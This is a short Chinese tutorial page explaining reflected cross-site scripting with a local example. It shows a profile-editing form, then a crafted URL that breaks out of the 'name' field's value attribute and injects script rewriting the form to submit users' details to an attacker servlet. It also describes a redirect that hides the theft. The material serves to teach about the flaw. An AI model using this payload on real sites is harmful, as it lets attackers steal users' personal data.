EasyCVR powershell loam算法测试 controller sms underscorejs vue数据绑定 后台管理ui h5表格模板 多店版微信商城 jq遍历 js鼠标离开事件 最新更新国内最快的dns ie内核浏览器怎么设置 java反射方法 jquery validate python计算器 python的数据类型 python基础语法 python正则表达 javaqueue java结束线程 java文件读写 kafka中文教程 千千静听绿色版 雪地求生 html特殊字符 vbs表白代码 服务器系统安装 flash基础 思源字体 迅雷会员共享账号 ABViewer eagle软件 脚本编程 压枪软件 怎么看淘龄 sendto函数 网页自动点击 jsp源码
当前位置: 首页 > 学习教程  > 编程学习

Xss跨站脚本攻击例子

2021/1/9 2:02:44 文章标签: 跨站攻击

假设编辑个人信息程式存在Xss漏洞1. 界面如下&#xff1a;http://127.0.0.1:8080/web/XssServlet?name001 代码&#xff1a; <h1>編輯個人信息</h1><form action"/web/XssServlet" method"post" name"login" id"login"…

假设编辑个人信息程式存在Xss漏洞

1. 界面如下:

http://127.0.0.1:8080/web/XssServlet?name=001



代码:

<h1>編輯個人信息</h1>
	<form action="/web/XssServlet" method="post" name="login" id="login"><br/>
		姓名:<input type="text" name="name" value="001"/><br/>
		郵箱:<input type="email" name="email" value=""/><br/>
		自我介紹: <textarea name="introduce" value=""></textarea><br/>
		<input type="submit" value="確認保存"/>
</form>


2.   访问含有xss的脚步URl,并填完基本个人信息后,点击确认保存, 就会把用户的个人信息发送到攻击者 /Web/HackServlet 这个地址。

http://127.0.0.1:8080/web/XssServlet?name="><script>var+f=document.getElementById("login");+f.action="/web/HackServlet";+f.method="GET";</script><span+s="

代码:

<h1>編輯個人信息</h1>
	<form action="/web/XssServlet" method="post" name="login" id="login"><br/>
		姓名:<input type="text" name="name" value=""><script>var f=document.getElementById("login"); f.action="/web/HackServlet"; f.method="GET";</script><span s=""/><br/>
		郵箱:<input type="email" name="email" value=""/><br/>
		自我介紹: <textarea name="introduce" value=""></textarea><br/>
		<input type="submit" value="確認保存"/>
	</form>


3. 假设/Web/HackServlet 这个程式里面做下301重定向到编辑个人信息地址 http://127.0.0.1:8080/web/XssServlet?name=, 用户就还以为刚才填写的信息不正确,系统要求重新填写,然而攻击者已经获取到了用户的信息。


本文链接: http://www.dtmao.cc/news_show_1100239.shtml

附件下载

相关教程

    暂无相关的数据...

共有条评论 网友评论

验证码: 看不清楚?